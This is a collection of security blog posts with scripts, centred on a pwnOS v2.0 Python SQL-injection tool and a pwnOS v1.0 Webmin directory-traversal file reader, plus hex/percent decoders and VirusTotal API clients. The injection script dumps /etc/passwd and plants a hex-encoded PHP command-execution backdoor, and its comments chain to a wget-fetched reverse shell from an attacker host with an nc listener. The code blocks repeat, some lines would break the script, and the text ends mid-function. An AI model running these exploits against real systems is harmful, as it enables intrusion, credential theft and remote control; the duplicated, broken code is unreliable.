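#!/bin/bash
# Written: December 2012
# Modified: March 2014
# Decodes literal "\xHH" escape sequences in text back to ASCII: the
# printable range 0x20-0x7E plus 0x0A (newline). Anything that is not such
# an escape passes through untouched. Reads the file named on the command
# line, or stdin when no file is given.
#
# Usage: decodeHex.sh [file]
#        some_command | decodeHex.sh
#
# Differences from the original chain of 95 sed processes:
#   - \x25 now decodes to "%" (it used to produce the text "\x");
#   - \x26 now decodes to "&" (an unescaped "&" in a sed replacement stands
#     for the matched text, so the old rule changed nothing);
#   - lowercase hex digits (\x4a) are accepted as well as uppercase;
#   - the backslash rule (\x5C) runs last, so a freshly decoded backslash
#     can no longer be re-read as the start of a second escape
#     ("\x5Cx41" used to come out as "A"; it now comes out as "\x41");
#   - the input path is quoted, so file names containing spaces work;
#   - one sed process does all the work.
set -euo pipefail

#######################################
# Print the sed substitution that decodes one byte value.
# Arguments: $1 - byte value as a decimal integer in 0x20..0x7E
# Outputs:   one line, "s/\\xHH/<char>/g", where HH matches upper- or
#            lowercase hex digits and <char> is escaped for sed
#######################################
sed_rule_for() {
  local code=$1
  local hex pattern='' digit ch i
  printf -v hex '%02X' "$code"
  # Case-insensitive match for each hex digit: "4A" becomes "4[Aa]".
  for (( i = 0; i < 2; i++ )); do
    digit=${hex:i:1}
    case "$digit" in
      [A-F]) pattern+="[${digit}${digit,,}]" ;;   # ${var,,} needs bash 4+
      *)     pattern+=$digit ;;
    esac
  done
  # The character itself, produced by printf's own \xHH escape.
  printf -v ch "\\x${hex}"
  # "\" and "&" are special in a sed replacement; "/" is the delimiter.
  case "$ch" in
    '\') ch='\\' ;;
    '&') ch='\&' ;;
    '/') ch='\/' ;;
  esac
  printf 's/\\\\x%s/%s/g\n' "$pattern" "$ch"
}

#######################################
# Decode "\xHH" escapes on stdin and write the result to stdout.
# Globals:   none
# Arguments: none
#######################################
decode_hex() {
  local -a rules=()
  local code
  # Every printable byte except the backslash, which must come last.
  for (( code = 0x20; code <= 0x7E; code++ )); do
    (( code == 0x5C )) && continue
    rules+=(-e "$(sed_rule_for "$code")")
  done
  # "\n" in a replacement is a newline in GNU sed (the original relied on
  # that as well; BSD sed would need a literal escaped newline).
  rules+=(-e 's/\\x0[Aa]/\n/g')
  rules+=(-e "$(sed_rule_for $(( 0x5C )))")
  sed "${rules[@]}"
}

#######################################
# Entry point.
# Arguments: $1 - optional input file; stdin is used when absent
# Returns:   2 on usage error, 1 if the file cannot be read, else sed's status
#######################################
main() {
  local prog=${0##*/}
  # No file and a terminal on stdin means the caller forgot the argument.
  if (( $# > 1 )) || { (( $# == 0 )) && [[ -t 0 ]]; }; then
    printf 'Usage: %s [file]\n' "$prog" >&2
    exit 2
  fi
  if (( $# == 1 )); then
    if [[ ! -r "$1" ]]; then
      printf '%s: cannot read %s\n' "$prog" "$1" >&2
      exit 1
    fi
    decode_hex < "$1"
  else
    decode_hex
  fi
}

main "$@"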
Tuesday, March 11, 2014
Saturday, March 8, 2014
pwnOS v2.0 - Python Script that utilizes SQL Injection on Login
I wrote this Python script to demonstrate SQL injection on pwnOS v2.0. When run, it automates finding the user account the pwnOS database runs as, displaying the /etc/passwd file, and creating simple-backdoor.php in the /var/www directory as sb.php.
The sql injection occurs on the login.php page of pwnOS v2.0 at /var/www/login.php.
#!/usr/bin/python
# Python 2 script (print statements, raw_input) demonstrating the SQL
# injection in pwnOS v2.0's login.php: the value typed into the email form
# field ends up inside the backend SQL string, so a chosen UNION SELECT is
# executed and its result rendered in the login response. On the server
# side a parameterised query would stop this. The target host and port are
# hard-coded below.
import socket
import os, sys  # NOTE(review): neither os nor sys is used in this script
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.10.10.100', 80))  # connect() returns None; 'connect' is never read
# Initial HTTP Request to obtain a PHP Session
# Header lines end in "\n" rather than the "\r\n" HTTP specifies; the posted
# script relies on the target accepting that.
httpRequest = "GET /index.php HTTP/1.1\n"
httpRequest += "Host: test.com\n\n"
s.send(httpRequest)  # send() may write fewer bytes than given; sendall() would not
data = s.recv(1024)  # only the first 1024 bytes of the response are read here
#Save the httpResponse to a file
f = open('temp.txt','w')  # written to the current directory and never removed
f.write(data)
f.close()
# Pull the PHPSESSID out of the file
with open("temp.txt") as file:  # 'file' shadows the Python 2 builtin of that name
    for line in file:
        if 'PHPSESSID' in line:
            # Fixed offsets -- presumably "Set-Cookie: " (12 chars) followed by
            # "PHPSESSID=<26-char id>" (36 chars); verify against the server.
            # If no such line arrives, sessionID is never assigned and the
            # Cookie header below raises NameError.
            sessionID = line[12:48]
s.recv(1024)  # presumably drains the rest of the first response; the data is discarded
httpRequest = "POST /login.php HTTP/1.1\n"
httpRequest += "Host: 10.10.10.100\n"
httpRequest += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0\n"
httpRequest += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n"
httpRequest += "Accept-Language: en-US,en;q=0.5\n"
httpRequest += "Referer: http://10.10.10.100/login.php\n"
httpRequest += "Cookie: " + sessionID + "\n"  # re-uses the session obtained above
httpRequest += "Connection: keep-alive\n"
httpRequest += "Content-Type: application/x-www-form-urlencoded\n"
# For the query to find the user account that is running the database
# UNION SELECT 1,2,3,user(),5,6,7,8;-- -
# For the query to pull a file like the /etc/passwd
# Use the same process to display the passwords in /var/mysqli_connect.php
# UNION SELECT 1,2,3,load_file(/etc/passwd),5,6,7,8;-- - # This does not work due to /etc/passwd needs to be hex encoded
# echo -n "/etc/passwd" | xxd -ps - # This from the command line will hex encode the file for us
# The following query will work to pull the /etc/passwd file from the file system
# UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8;-- -
# For the query to place the simple-backdoor.php in the /var/www/sb.php
# I used echo -n <of the simple-backdoor.php condensed to 1 line> | xxd -ps -
# UNION SELECT 0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297b206563686f20223c7072653e223b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d2824636d64293b206563686f20223c2f7072653e223b206469653b207d203f3e2055736167653a20687474703a2f2f7461726765742e636f6d2f73696d706c652d6261636b646f6f722e7068703f636d643d6361742b2f6574632f706173737764, 2, 3, 4, 5, 6, 7, 8 INTO OUTFILE '/var/www/sb.php'
# After the backdoor file exists you can use it to then copy a php-reverse-shell.php from /usr/share/webshells to /var/www/blog/config
# To do this you can:
# NOTE(review): the next line and the two other "(kali)" lines below are not
# comments -- "(kali)" is evaluated as a Python expression and raises
# NameError, so the script as posted stops here before the menu is shown.
(kali) # cd /usr/share/webshells/php/
(kali) # python -m SimpleHTTPServer # Setup a listening webserver on port 8000 to pull the reverse shell from
# URL: http://10.10.10.100/sb.php?cmd=wget http://10.10.10.1:8000/php-reverse-shell.php -O /var/www/blog/config/reverse.php
# The config directory allows the www-data user to write to it
# Then on kali start listening on the port specified in the php-reverse-shell.php with ip of 10.10.10.1
(kali) # nc -lvp
# Then visit on the victim URL: http://10.10.10.100/config/blog/reverse.php
# This will also allow you to see /var/mysqli_config.php from a semi-shell
print "Select Query\n"
print "1. Pull user account that the database is running as\n"
print "2. Pull /etc/passwd File\n"
print "3. Drop php backdoor into /var/www/sb.php\n"
print "4. Custom Query\n"
query = raw_input('Select: ')
if query == '1':
    querySelected = "UNION SELECT 1,2,3,user(),5,6,7,8;-- -"
elif query == '2':
    querySelected = 'UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8;-- -'
elif query == '3':
    # The hex literal is the xxd-encoded PHP source described in the
    # comments above, written out with INTO OUTFILE.
    querySelected = "UNION SELECT 0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297b206563686f20223c7072653e223b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d2824636d64293b206563686f20223c2f7072653e223b206469653b207d203f3e2055736167653a20687474703a2f2f7461726765742e636f6d2f73696d706c652d6261636b646f6f722e7068703f636d643d6361742b2f6574632f706173737764, 2, 3, 4, 5, 6, 7, 8 INTO OUTFILE '/var/www/sb.php';-- -"
elif query == '4':
    querySelected = raw_input('Custom Query: ')
# Any other menu choice leaves querySelected unassigned -> NameError below.
# "sumbitted" is the field name exactly as sent (sic); whether login.php
# expects that spelling cannot be checked here.
postInfo = "email=' " + querySelected + "&pass=thepcnerd&submit=Login&sumbitted=TRUE\n\n"
lengthPostInfo = len(postInfo)  # includes the two trailing newlines
httpRequest += "Content-Length: " + str(lengthPostInfo) + "\n\n"
httpRequest += postInfo
s.send(httpRequest)
if query == '1':
    data = s.recv(4096)  # a single 4096-byte read; a longer response is truncated
    #print data
    #Save the httpResponse to a file
    f = open('temp2.txt','w')
    f.write(data)
    f.close()
    # Pull the <h1> out of the file
    with open("temp2.txt") as file:
        for line in file:
            if '<h1>' in line:
                print line
elif query == '2':
    data = s.recv(4096)
    #print data
    #Save the httpResponse to a file
    f = open('temp2.txt','w')
    f.write(data)
    f.close()
    data = s.recv(4096)  # second chunk; blocks if the server sends nothing more
    #print data
    #Save the httpResponse to a file
    f = open('temp2.txt','a')
    f.write(data)
    f.close()
    with open("temp2.txt") as file:
        for line in file:
            print line  # each line keeps its own "\n", so output is double-spaced
elif query == '3':
    data = s.recv(4096)
    print data
elif query == '4':
    data = s.recv(4096)
    print data
    data = s.recv(4096)  # blocks if the server has nothing more to send
    print data
The sql injection occurs on the login.php page of pwnOS v2.0 at /var/www/login.php.
#!/usr/bin/python
# Python 2 script (print statements, raw_input) demonstrating the SQL
# injection in pwnOS v2.0's login.php: the value typed into the email form
# field ends up inside the backend SQL string, so a chosen UNION SELECT is
# executed and its result rendered in the login response. On the server
# side a parameterised query would stop this. The target host and port are
# hard-coded below.
import socket
import os, sys  # NOTE(review): neither os nor sys is used in this script
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.10.10.100', 80))  # connect() returns None; 'connect' is never read
# Initial HTTP Request to obtain a PHP Session
# Header lines end in "\n" rather than the "\r\n" HTTP specifies; the posted
# script relies on the target accepting that.
httpRequest = "GET /index.php HTTP/1.1\n"
httpRequest += "Host: test.com\n\n"
s.send(httpRequest)  # send() may write fewer bytes than given; sendall() would not
data = s.recv(1024)  # only the first 1024 bytes of the response are read here
#Save the httpResponse to a file
f = open('temp.txt','w')  # written to the current directory and never removed
f.write(data)
f.close()
# Pull the PHPSESSID out of the file
with open("temp.txt") as file:  # 'file' shadows the Python 2 builtin of that name
    for line in file:
        if 'PHPSESSID' in line:
            # Fixed offsets -- presumably "Set-Cookie: " (12 chars) followed by
            # "PHPSESSID=<26-char id>" (36 chars); verify against the server.
            # If no such line arrives, sessionID is never assigned and the
            # Cookie header below raises NameError.
            sessionID = line[12:48]
s.recv(1024)  # presumably drains the rest of the first response; the data is discarded
httpRequest = "POST /login.php HTTP/1.1\n"
httpRequest += "Host: 10.10.10.100\n"
httpRequest += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0\n"
httpRequest += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n"
httpRequest += "Accept-Language: en-US,en;q=0.5\n"
httpRequest += "Referer: http://10.10.10.100/login.php\n"
httpRequest += "Cookie: " + sessionID + "\n"  # re-uses the session obtained above
httpRequest += "Connection: keep-alive\n"
httpRequest += "Content-Type: application/x-www-form-urlencoded\n"
# For the query to find the user account that is running the database
# UNION SELECT 1,2,3,user(),5,6,7,8;-- -
# For the query to pull a file like the /etc/passwd
# Use the same process to display the passwords in /var/mysqli_connect.php
# UNION SELECT 1,2,3,load_file(/etc/passwd),5,6,7,8;-- - # This does not work due to /etc/passwd needs to be hex encoded
# echo -n "/etc/passwd" | xxd -ps - # This from the command line will hex encode the file for us
# The following query will work to pull the /etc/passwd file from the file system
# UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8;-- -
# For the query to place the simple-backdoor.php in the /var/www/sb.php
# I used echo -n <of the simple-backdoor.php condensed to 1 line> | xxd -ps -
# UNION SELECT 0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297b206563686f20223c7072653e223b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d2824636d64293b206563686f20223c2f7072653e223b206469653b207d203f3e2055736167653a20687474703a2f2f7461726765742e636f6d2f73696d706c652d6261636b646f6f722e7068703f636d643d6361742b2f6574632f706173737764, 2, 3, 4, 5, 6, 7, 8 INTO OUTFILE '/var/www/sb.php'
# After the backdoor file exists you can use it to then copy a php-reverse-shell.php from /usr/share/webshells to /var/www/blog/config
# To do this you can:
# NOTE(review): the next line and the two other "(kali)" lines below are not
# comments -- "(kali)" is evaluated as a Python expression and raises
# NameError, so the script as posted stops here before the menu is shown.
(kali) # cd /usr/share/webshells/php/
(kali) # python -m SimpleHTTPServer # Setup a listening webserver on port 8000 to pull the reverse shell from
# URL: http://10.10.10.100/sb.php?cmd=wget http://10.10.10.1:8000/php-reverse-shell.php -O /var/www/blog/config/reverse.php
# The config directory allows the www-data user to write to it
# Then on kali start listening on the port specified in the php-reverse-shell.php with ip of 10.10.10.1
(kali) # nc -lvp
# Then visit on the victim URL: http://10.10.10.100/config/blog/reverse.php
# This will also allow you to see /var/mysqli_config.php from a semi-shell
print "Select Query\n"
print "1. Pull user account that the database is running as\n"
print "2. Pull /etc/passwd File\n"
print "3. Drop php backdoor into /var/www/sb.php\n"
print "4. Custom Query\n"
query = raw_input('Select: ')
if query == '1':
    querySelected = "UNION SELECT 1,2,3,user(),5,6,7,8;-- -"
elif query == '2':
    querySelected = 'UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8;-- -'
elif query == '3':
    # The hex literal is the xxd-encoded PHP source described in the
    # comments above, written out with INTO OUTFILE.
    querySelected = "UNION SELECT 0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297b206563686f20223c7072653e223b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d2824636d64293b206563686f20223c2f7072653e223b206469653b207d203f3e2055736167653a20687474703a2f2f7461726765742e636f6d2f73696d706c652d6261636b646f6f722e7068703f636d643d6361742b2f6574632f706173737764, 2, 3, 4, 5, 6, 7, 8 INTO OUTFILE '/var/www/sb.php';-- -"
elif query == '4':
    querySelected = raw_input('Custom Query: ')
# Any other menu choice leaves querySelected unassigned -> NameError below.
# "sumbitted" is the field name exactly as sent (sic); whether login.php
# expects that spelling cannot be checked here.
postInfo = "email=' " + querySelected + "&pass=thepcnerd&submit=Login&sumbitted=TRUE\n\n"
lengthPostInfo = len(postInfo)  # includes the two trailing newlines
httpRequest += "Content-Length: " + str(lengthPostInfo) + "\n\n"
httpRequest += postInfo
s.send(httpRequest)
if query == '1':
    data = s.recv(4096)  # a single 4096-byte read; a longer response is truncated
    #print data
    #Save the httpResponse to a file
    f = open('temp2.txt','w')
    f.write(data)
    f.close()
    # Pull the <h1> out of the file
    with open("temp2.txt") as file:
        for line in file:
            if '<h1>' in line:
                print line
elif query == '2':
    data = s.recv(4096)
    #print data
    #Save the httpResponse to a file
    f = open('temp2.txt','w')
    f.write(data)
    f.close()
    data = s.recv(4096)  # second chunk; blocks if the server sends nothing more
    #print data
    #Save the httpResponse to a file
    f = open('temp2.txt','a')
    f.write(data)
    f.close()
    with open("temp2.txt") as file:
        for line in file:
            print line  # each line keeps its own "\n", so output is double-spaced
elif query == '3':
    data = s.recv(4096)
    print data
elif query == '4':
    data = s.recv(4096)
    print data
    data = s.recv(4096)  # blocks if the server has nothing more to send
    print data
pwnOS v1.0 Python Script for Reading files through Directory Traversal
I was working with pwnOS v1.0 to gain root. One of the steps was to use a directory traversal flaw in miniserv to read files on the filesystem. I liked the Metasploit module, but I wanted a quicker script whose output I could save. I then wrote the following script in Python:
#!/usr/bin/python
# This script was built off of the concept of the metasploit auxiliary plugin
# for displaying files on Webmin due to a directory traversal vulnerability.
# It lets you name the file you would like to pull and retrieves it quicker
# than from inside metasploit. You can also redirect the output to a file.
#
# Python 2 (print statements). The target host and port are hard-coded; the
# requested path comes from argv[1] and is inserted into the request line
# without any encoding.
import socket
import os, sys  # NOTE(review): only sys is used; os is never referenced
import urllib  # NOTE(review): imported but never used
if len(sys.argv) > 1:
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect(('192.168.11.151',10000))  # connect() returns None; 'connect' is never read
    # Found that the %01 can be substituted for other characters.
    # Forty "/..%01" segments are prepended to the requested path; why the
    # server resolves that outside its document root is not visible here.
    url = "/unauthenticated/" + "/..%01"*40 + sys.argv[1]
    httpRequest = "GET " + url + " HTTP/1.1\n"  # "\n" rather than HTTP's "\r\n"
    httpRequest += "Host: test.com\n\n"
    s.send(httpRequest)  # send() may write fewer bytes than given; sendall() would not
    # Reads up to 14 chunks of 1024 bytes and prints each as it arrives.
    # recv() blocks while the server still holds the connection open with
    # nothing more to send; once the server closes, the remaining iterations
    # print empty strings. A response longer than 14 KiB is cut off.
    for i in range(1,15):
        data = s.recv(1024)
        print data
else:
    print "Usage: ./displayFile.py file"
    print "The file in this case is any file on the file system you can pull.\n\n"
#!/usr/bin/python
# This script was built off of the concept of the metasploit auxiliary plugin
# for displaying files on Webmin due to a directory traversal vulnerability.
# It lets you name the file you would like to pull and retrieves it quicker
# than from inside metasploit. You can also redirect the output to a file.
#
# Python 2 (print statements). The target host and port are hard-coded; the
# requested path comes from argv[1] and is inserted into the request line
# without any encoding.
import socket
import os, sys  # NOTE(review): only sys is used; os is never referenced
import urllib  # NOTE(review): imported but never used
if len(sys.argv) > 1:
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect(('192.168.11.151',10000))  # connect() returns None; 'connect' is never read
    # Found that the %01 can be substituted for other characters.
    # Forty "/..%01" segments are prepended to the requested path; why the
    # server resolves that outside its document root is not visible here.
    url = "/unauthenticated/" + "/..%01"*40 + sys.argv[1]
    httpRequest = "GET " + url + " HTTP/1.1\n"  # "\n" rather than HTTP's "\r\n"
    httpRequest += "Host: test.com\n\n"
    s.send(httpRequest)  # send() may write fewer bytes than given; sendall() would not
    # Reads up to 14 chunks of 1024 bytes and prints each as it arrives.
    # recv() blocks while the server still holds the connection open with
    # nothing more to send; once the server closes, the remaining iterations
    # print empty strings. A response longer than 14 KiB is cut off.
    for i in range(1,15):
        data = s.recv(1024)
        print data
else:
    print "Usage: ./displayFile.py file"
    print "The file in this case is any file on the file system you can pull.\n\n"
Wednesday, March 5, 2014
Decode Hex to ASCII Bash Script
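#!/bin/bash
# Decodes URL percent-encoding ("%HH") back to ASCII text for the printable
# range 0x20-0x7E plus %0A (newline). Reads the file named on the command
# line, or stdin when no file is given; anything that is not a %HH sequence
# passes through untouched.
#
# Usage: decodePercent.sh [file]
#        some_command | decodePercent.sh
#
# Differences from the original chain of 20 sed processes:
#   - every printable byte is covered, not just the 20 hand-picked ones
#     (notably %25 -> "%" was missing);
#   - lowercase hex digits (%3c) are accepted as well as uppercase;
#   - %25 is decoded last, so "%2520" yields "%20" instead of being
#     decoded twice into a space;
#   - the input path is quoted, so file names containing spaces work;
#   - one sed process does all the work.
set -euo pipefail

#######################################
# Print the sed substitution that decodes one byte value.
# Arguments: $1 - byte value as a decimal integer in 0x20..0x7E
# Outputs:   one line, "s/%HH/<char>/g", where HH matches upper- or
#            lowercase hex digits and <char> is escaped for sed
#######################################
sed_rule_for() {
  local code=$1
  local hex pattern='' digit ch i
  printf -v hex '%02X' "$code"
  # Case-insensitive match for each hex digit: "3C" becomes "3[Cc]".
  for (( i = 0; i < 2; i++ )); do
    digit=${hex:i:1}
    case "$digit" in
      [A-F]) pattern+="[${digit}${digit,,}]" ;;   # ${var,,} needs bash 4+
      *)     pattern+=$digit ;;
    esac
  done
  # The character itself, produced by printf's own \xHH escape.
  printf -v ch "\\x${hex}"
  # "\" and "&" are special in a sed replacement; "/" is the delimiter.
  case "$ch" in
    '\') ch='\\' ;;
    '&') ch='\&' ;;
    '/') ch='\/' ;;
  esac
  printf 's/%%%s/%s/g\n' "$pattern" "$ch"
}

#######################################
# Decode "%HH" sequences on stdin and write the result to stdout.
# Globals:   none
# Arguments: none
#######################################
decode_percent() {
  local -a rules=()
  local code
  # Every printable byte except "%" itself, which must come last so a
  # decoded "%" is never re-read as the start of a second sequence.
  for (( code = 0x20; code <= 0x7E; code++ )); do
    (( code == 0x25 )) && continue
    rules+=(-e "$(sed_rule_for "$code")")
  done
  # "\n" in a replacement is a newline in GNU sed (the original relied on
  # that as well; BSD sed would need a literal escaped newline).
  rules+=(-e 's/%0[Aa]/\n/g')
  rules+=(-e "$(sed_rule_for $(( 0x25 )))")
  sed "${rules[@]}"
}

#######################################
# Entry point.
# Arguments: $1 - optional input file; stdin is used when absent
# Returns:   2 on usage error, 1 if the file cannot be read, else sed's status
#######################################
main() {
  local prog=${0##*/}
  # No file and a terminal on stdin means the caller forgot the argument.
  if (( $# > 1 )) || { (( $# == 0 )) && [[ -t 0 ]]; }; then
    printf 'Usage: %s [file]\n' "$prog" >&2
    exit 2
  fi
  if (( $# == 1 )); then
    if [[ ! -r "$1" ]]; then
      printf '%s: cannot read %s\n' "$prog" "$1" >&2
      exit 1
    fi
    decode_percent < "$1"
  else
    decode_percent
  fi
}

main "$@"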
VirusTotal API Submission - Domain Report
This is helpful:
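#!/usr/bin/python
"""Fetch the VirusTotal v2 domain report for one domain and pretty-print it.

Usage: ./domainReport.py <domain>

The API key is taken from the VT_API_KEY environment variable rather than
being written into the source, so the script can be shared or committed
without leaking the key. Runs under Python 2 and Python 3.
"""
import json
import os
import sys

try:  # Python 3
    from urllib.parse import urlencode
    from urllib.request import urlopen
except ImportError:  # Python 2: urllib2.urlopen, which the original already imported
    from urllib import urlencode
    from urllib2 import urlopen

URL = "https://www.virustotal.com/vtapi/v2/domain/report"


def fetch_domain_report(domain, api_key):
    """Return the decoded JSON report (a dict) for ``domain``.

    The key travels as a query parameter, which is how the v2 API takes it.
    Raises whatever urlopen raises on network or HTTP errors, and ValueError
    if the reply body is not JSON.
    """
    query = urlencode({"domain": domain, "apikey": api_key})
    response = urlopen("%s?%s" % (URL, query))
    try:
        body = response.read()
    finally:
        response.close()
    if isinstance(body, bytes):  # Python 3 returns bytes; the API answers in UTF-8
        body = body.decode("utf-8")
    return json.loads(body)


def main(argv):
    """Entry point; returns the process exit status (0 ok, 2 usage error)."""
    if len(argv) < 2:
        sys.stderr.write("Usage: ./domainReport.py <domain>\n")
        return 2
    api_key = os.environ.get("VT_API_KEY", "")
    if not api_key:
        sys.stderr.write("VT_API_KEY is not set; export your VirusTotal API key first\n")
        return 2
    print(json.dumps(fetch_domain_report(argv[1], api_key), indent=4))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))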
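#!/usr/bin/python
"""Fetch the VirusTotal v2 domain report for one domain and pretty-print it.

Usage: ./domainReport.py <domain>

The API key is taken from the VT_API_KEY environment variable rather than
being written into the source, so the script can be shared or committed
without leaking the key. Runs under Python 2 and Python 3.
"""
import json
import os
import sys

try:  # Python 3
    from urllib.parse import urlencode
    from urllib.request import urlopen
except ImportError:  # Python 2: urllib2.urlopen, which the original already imported
    from urllib import urlencode
    from urllib2 import urlopen

URL = "https://www.virustotal.com/vtapi/v2/domain/report"


def fetch_domain_report(domain, api_key):
    """Return the decoded JSON report (a dict) for ``domain``.

    The key travels as a query parameter, which is how the v2 API takes it.
    Raises whatever urlopen raises on network or HTTP errors, and ValueError
    if the reply body is not JSON.
    """
    query = urlencode({"domain": domain, "apikey": api_key})
    response = urlopen("%s?%s" % (URL, query))
    try:
        body = response.read()
    finally:
        response.close()
    if isinstance(body, bytes):  # Python 3 returns bytes; the API answers in UTF-8
        body = body.decode("utf-8")
    return json.loads(body)


def main(argv):
    """Entry point; returns the process exit status (0 ok, 2 usage error)."""
    if len(argv) < 2:
        sys.stderr.write("Usage: ./domainReport.py <domain>\n")
        return 2
    api_key = os.environ.get("VT_API_KEY", "")
    if not api_key:
        sys.stderr.write("VT_API_KEY is not set; export your VirusTotal API key first\n")
        return 2
    print(json.dumps(fetch_domain_report(argv[1], api_key), indent=4))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))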
VirusTotal API Submission - Submit URL
Found this to be helpful:
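#!/usr/bin/python
"""Submit one URL to VirusTotal for scanning (v2 url/scan) and pretty-print
the JSON reply.

Usage: ./submitURL <url>

The API key is taken from the VT_API_KEY environment variable rather than
being written into the source, so the script can be shared or committed
without leaking the key. The unused third-party simplejson import is gone,
so only the standard library is needed. Runs under Python 2 and Python 3.
"""
import json
import os
import sys

try:  # Python 3
    from urllib.parse import urlencode
    from urllib.request import Request, urlopen
except ImportError:  # Python 2: the modules the original script used
    from urllib import urlencode
    from urllib2 import Request, urlopen

URL = "https://www.virustotal.com/vtapi/v2/url/scan"


def submit_url(target, api_key):
    """POST ``target`` to the scan endpoint and return the decoded reply (a dict).

    The URL and the key travel in the form body. Raises whatever urlopen
    raises on network or HTTP errors, and ValueError if the reply is not JSON.
    """
    form = urlencode({"url": target, "apikey": api_key})
    if not isinstance(form, bytes):  # Python 3: a POST body must be bytes
        form = form.encode("ascii")  # urlencode output is pure ASCII
    response = urlopen(Request(URL, form))
    try:
        body = response.read()
    finally:
        response.close()
    if isinstance(body, bytes):  # Python 3 returns bytes; the API answers in UTF-8
        body = body.decode("utf-8")
    return json.loads(body)


def main(argv):
    """Entry point; returns the process exit status (0 ok, 2 usage error)."""
    if len(argv) < 2:
        sys.stderr.write("Usage: ./submitURL <url>\n")
        return 2
    api_key = os.environ.get("VT_API_KEY", "")
    if not api_key:
        sys.stderr.write("VT_API_KEY is not set; export your VirusTotal API key first\n")
        return 2
    print(json.dumps(submit_url(argv[1], api_key), indent=4))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))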
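#!/usr/bin/python
"""Submit one URL to VirusTotal for scanning (v2 url/scan) and pretty-print
the JSON reply.

Usage: ./submitURL <url>

The API key is taken from the VT_API_KEY environment variable rather than
being written into the source, so the script can be shared or committed
without leaking the key. The unused third-party simplejson import is gone,
so only the standard library is needed. Runs under Python 2 and Python 3.
"""
import json
import os
import sys

try:  # Python 3
    from urllib.parse import urlencode
    from urllib.request import Request, urlopen
except ImportError:  # Python 2: the modules the original script used
    from urllib import urlencode
    from urllib2 import Request, urlopen

URL = "https://www.virustotal.com/vtapi/v2/url/scan"


def submit_url(target, api_key):
    """POST ``target`` to the scan endpoint and return the decoded reply (a dict).

    The URL and the key travel in the form body. Raises whatever urlopen
    raises on network or HTTP errors, and ValueError if the reply is not JSON.
    """
    form = urlencode({"url": target, "apikey": api_key})
    if not isinstance(form, bytes):  # Python 3: a POST body must be bytes
        form = form.encode("ascii")  # urlencode output is pure ASCII
    response = urlopen(Request(URL, form))
    try:
        body = response.read()
    finally:
        response.close()
    if isinstance(body, bytes):  # Python 3 returns bytes; the API answers in UTF-8
        body = body.decode("utf-8")
    return json.loads(body)


def main(argv):
    """Entry point; returns the process exit status (0 ok, 2 usage error)."""
    if len(argv) < 2:
        sys.stderr.write("Usage: ./submitURL <url>\n")
        return 2
    api_key = os.environ.get("VT_API_KEY", "")
    if not api_key:
        sys.stderr.write("VT_API_KEY is not set; export your VirusTotal API key first\n")
        return 2
    print(json.dumps(submit_url(argv[1], api_key), indent=4))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))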
VirusTotal API Submission - IP Address Report
Found this to be helpful in gathering reports about IP Addresses:
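#!/usr/bin/python
"""Fetch the VirusTotal v2 IP-address report for one address and pretty-print it.

Usage: ./ipAddressReport <ip>

The API key is taken from the VT_API_KEY environment variable rather than
being written into the source, so the script can be shared or committed
without leaking the key. Runs under Python 2 and Python 3.
"""
import json
import os
import sys

try:  # Python 3
    from urllib.parse import urlencode
    from urllib.request import urlopen
except ImportError:  # Python 2: urllib2.urlopen, which the original already imported
    from urllib import urlencode
    from urllib2 import urlopen

URL = "https://www.virustotal.com/vtapi/v2/ip-address/report"


def fetch_ip_report(ip, api_key):
    """Return the decoded JSON report (a dict) for ``ip``.

    The key travels as a query parameter, which is how the v2 API takes it.
    Raises whatever urlopen raises on network or HTTP errors, and ValueError
    if the reply body is not JSON.
    """
    query = urlencode({"ip": ip, "apikey": api_key})
    response = urlopen("%s?%s" % (URL, query))
    try:
        body = response.read()
    finally:
        response.close()
    if isinstance(body, bytes):  # Python 3 returns bytes; the API answers in UTF-8
        body = body.decode("utf-8")
    return json.loads(body)


def main(argv):
    """Entry point; returns the process exit status (0 ok, 2 usage error)."""
    if len(argv) < 2:
        sys.stderr.write("Usage: ./ipAddressReport <ip>\n")
        return 2
    api_key = os.environ.get("VT_API_KEY", "")
    if not api_key:
        sys.stderr.write("VT_API_KEY is not set; export your VirusTotal API key first\n")
        return 2
    print(json.dumps(fetch_ip_report(argv[1], api_key), indent=4))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))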
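#!/usr/bin/python
"""Fetch the VirusTotal v2 IP-address report for one address and pretty-print it.

Usage: ./ipAddressReport <ip>

The API key is taken from the VT_API_KEY environment variable rather than
being written into the source, so the script can be shared or committed
without leaking the key. Runs under Python 2 and Python 3.
"""
import json
import os
import sys

try:  # Python 3
    from urllib.parse import urlencode
    from urllib.request import urlopen
except ImportError:  # Python 2: urllib2.urlopen, which the original already imported
    from urllib import urlencode
    from urllib2 import urlopen

URL = "https://www.virustotal.com/vtapi/v2/ip-address/report"


def fetch_ip_report(ip, api_key):
    """Return the decoded JSON report (a dict) for ``ip``.

    The key travels as a query parameter, which is how the v2 API takes it.
    Raises whatever urlopen raises on network or HTTP errors, and ValueError
    if the reply body is not JSON.
    """
    query = urlencode({"ip": ip, "apikey": api_key})
    response = urlopen("%s?%s" % (URL, query))
    try:
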